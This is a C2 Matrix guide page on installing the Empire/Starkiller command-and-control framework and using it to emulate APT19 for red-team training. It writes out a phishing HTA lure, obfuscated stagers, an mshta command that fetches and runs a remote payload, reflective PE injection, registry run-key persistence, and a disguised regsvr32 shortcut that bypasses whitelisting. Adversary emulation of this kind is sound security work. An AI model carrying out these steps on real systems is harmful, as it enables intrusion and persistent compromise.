C2 Matrix
Search…
C2 Matrix
The C2 Matrix
SANS Slingshot C2 Matrix VM
Contribute
Lab Infrastructure
C2 Matrix Eval Lab
Basic Lab
Virtual Machines with C2s
Docker
Resources
C2
Caldera
Covenant
Empire
Faction
ibombshell
Koadic
Merlin
Mythic
Nuages
PoshC2
PowerHub
SilentTrinity
Sliver
SCYTHE
TrevorC2
Attack Infrastructure
Resources
Redirectors/Relays
Detection
Basics
Beacons
JA3/JA3S Hashes
JARM
Powered By GitBook
Empire
Empire is fully supported by BC-Security
Demo of Empire with Starkiller is in this Red Team Village event video where I emulate APT19:

Install Empire

Install on Kali:
sudo apt install powershell-empire
Install on Ubuntu:
cd /opt
sudo git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh
If you are installing the newer version of Empire on the SANS Slingshot C2 Matrix Edition VM, there is a small bug because it wants Ubuntu 20.04 but slingshot is in 18.04. Replace the line in setup/install.sh with the correct version:
And comment the version test:
#if [ $VERSION_ID != "20.04" ]; then # echo -e '\x1b[1;31m[!] Ubuntu must be 20.04\x1b[0m' && exit #fi
Download Starkiller if you want a GUI:
cd /opt
sudo wget https://github.com/BC-SECURITY/Starkiller/releases/download/v1.0.0/starkiller-1.0.0.AppImage
sudo chmod +x starkiller-1.0.0.AppImage

Run Empire

sudo empire
On Kali:
sudo powershell-empire

Run Starkiller

Run Empire for connectivity through Starkiller if you want a GUI:
sudo empire --rest --username <user> --password <password>
Open Starkiller:
cd /opt/starkiller
./starkiller-1.2.2.AppImage
Login to Starkiller:
  • Name: localhost:1337
  • Username: <user>
  • Password: <password>

Emulating TTPs

Will use an adversary emulation plan for APT19 as an example: https://www.scythe.io/library/threatthursday-apt19
Tactic
Description
Description
APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services.
Goal and Intent
Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks.
Command and Control
Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) - used Base64 to encode communications to the C2 server
Initial Access
Spearphishing attachment (T1193); Spearphishing link (T1192)
Execution
PowerShell (T1086); User Execution; Hidden Windows (T1143) - used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden; Obfuscated Files or Information (T1027) - used Base64 to obfuscate commands and the payload; DLL Side-Loading (T1073)
Discover
System Owner/User Discovery (T1033); System Information Discovery (T1082) System Network Configuration Discovery (T1016)
Persistence
Registry Run Keys/ Start up Folder (T1060) - establishes persistence by setting the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-%LOCALAPPDATA%\
Defense Evasion
Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques

Listeners

Create Listener
Type: http
Name: http
Host: http://10.0.0.187
Port: 80
BindIP: 10.0.0.187
Jitter: 0.5
StagingKey: georgy

Stagers

Generate Stager HTA:
Type: windows/hta
Listner: http
Base64: True
Language: powershell
Outfile: /tmp/Resume.hta
Generate Stager SCT:
Type: windows/launcher_sct
Listner: http
Base64: True
Language: powershell
Generate Stager DLL:
Type: windows/dll
Listner: http
Arch: x86
Language: powershell
OutFile: /tmp/launcher.dll
Optional Fields
Obfuscate: True
ObfuscateCommand: Token\String\1
Download the stagers to /tmp and serve with SimpleHTTPServer
cd /tmp
python -m SimpleHTTPServer 8080

Initial Access

Email with link to Resume.hta

Execution

Show execution of HTA file:
mshta http://10.0.0.187:8080/Resume.hta
Migrate to another process with reflective PE Injection: https://www.bc-security.org/post/reflective-pe-injection-in-windows-10-1909/
See processes running: ps
usemodule code_execution/invoke_reflectivepeinjection
set ProcID: <processID>
set DllPath: /tmp/launcher.dll

Discovery

whoami
usemodule situational_awareness/host/antivirusproduct
usemodule situational_awareness/host/get_uaclevel
usemodule situational_awareness/host/winenum

Persistence

usemodule persistence/userland/registry
set Listener: http
Open regedit HKCU\Software\Microsoft\Windows\CurrentVersion

Defense Evasion

Execution with regsvr32 and scripting. Created a shortcut called Chrome with Target set as:
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\regsvr32.exe /s /n /u /i:http:\10.0.0.187:8080\launcher.sct scrobj.dll"

Upload

cd C:\Users\<username>
upload /tmp/file
shell C:\Users\<username>\<executable>

Other Resources

C2 - Previous
Covenant
Next - C2
Faction
Last modified 11mo ago
Copy link
Outline
Install Empire
Run Empire
Run Starkiller
Emulating TTPs
Listeners
Stagers
Initial Access
Execution
Discovery
Persistence
Defense Evasion
Upload
Other Resources